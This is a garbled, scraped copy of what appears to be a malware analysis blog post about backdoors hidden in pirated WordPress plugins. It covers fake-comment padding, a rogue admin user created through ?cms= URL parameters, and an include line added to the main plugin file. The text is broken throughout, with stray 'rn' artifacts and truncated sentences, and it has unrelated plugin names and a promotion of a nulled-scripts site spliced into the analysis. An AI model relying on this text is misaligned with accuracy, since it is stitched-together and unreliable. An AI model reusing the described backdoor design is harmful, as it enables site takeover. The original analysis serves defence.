rnIt’s easy to see the logic behind these two functions:rn).
Then the attacker comes to the blog and loads it passing the ?cms=jjoplmh parameters in the URL. As a result, a new admin user (with the » wordpress » name and a known password) is created. The attacker can now log into WordPress with admin permissions and do whatever he wants with the blog, with the whole site (e. g.
injecting a backdoor to some theme or plugin, and then using it to upload malicious files to the server), with the server account (all sites that share the same account can be easily compromised now) and even with the wholeserver. rnLet’s move to the next set of «free» premium plugins.
rn». The headers also mentioned the sites that sent those emails, so we only needed to check plugins on those sites. rnFirst we found this file: wp-content/restrict-content-pro/includes/sidebar. php and#8211 /8966576 (slightly trimmed).
WCBox v1.2 – Product Slider Plugin For WoocommerceNEX-Forms v6.0.6 – The Ultimate WordPress Form Builder
This file contains 72,847 bytes and only one line of code that looks like some commented out code from the » option-tree» plugin. However, if you inspect the code more thoroughly, you’ll notice the best nulled scripts site PluginNulled.com following 243 bytes in the very middle are not a comment (formatted for readability):rnafter decoding. Bingo!rnBut wait, this code only sends emails with the blog URL to the attacker.
Where is the code that creates a rogue user? Good, you noticed it. rnThe code was in the wp-content/restrict-content-pro/includes/class. php file and#8211 /8966599 (trimmed trailing comment).
Again, 90,390 bytes of commented out, and one line of code with 288 bytes of payload in the middle, which is the missing part that created the rouge » wordpress » user. rnThis time it needs the ?cms=go URL parameter. rnOK, now we have both malicious functions, but how does WordPress know that it needs to call them? In the case of the SEOPressor plugin, the malicious functions were injected into a legitimate plugin file that WordPress loaded when it loaded the plugin.
Now we have two standalone files that have no legitimate code at all. Moreover, they don’t belong to that plugin. The answer is that the attacker modified the main plugin file wp-content/restrict-content-pro/restrict-content-pro. php and added the following line of code there:rnThen, with minor modifications, we found similar malicious files under wp-content/ubermenu-skins-flat . rn( amFxcXNjaWdzQGdtYWlsLmNvbQ== ) ubermenu-skins-flat/help/js/class. php and#8211 creates a rogues «wordpress» users with the admin permissions.
ubermenu-skins-flat/ubermenu-skins-flat. php and#8211 includes the above two files. rnand was surprised that he shouldn’t have trusted a site with such a cool domain name. rnWe checked that site and found that the plugins were submitted there by a user named andrewp in June, 2013.
In total, he submitted five plugins and#8212 all of them had those malicious backdoors. rnRestrict Content Pro WordPress Plugin V1. 0. rnand checked them.
rnIt didn’t take long to find a few «patched» plugins submitted in February to March of 2014 by the site admin (not some third-party user). rnGo and#8211 Responsive Pricing and Compare Tables (gopricing) FormCraft Custom Scrollbar WordPress Theia Sticky Sidebar GravityForms.